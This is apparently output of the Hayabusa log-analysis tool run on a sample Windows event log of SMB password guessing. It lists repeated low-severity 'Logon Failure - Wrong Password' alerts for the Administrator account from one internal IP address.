2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
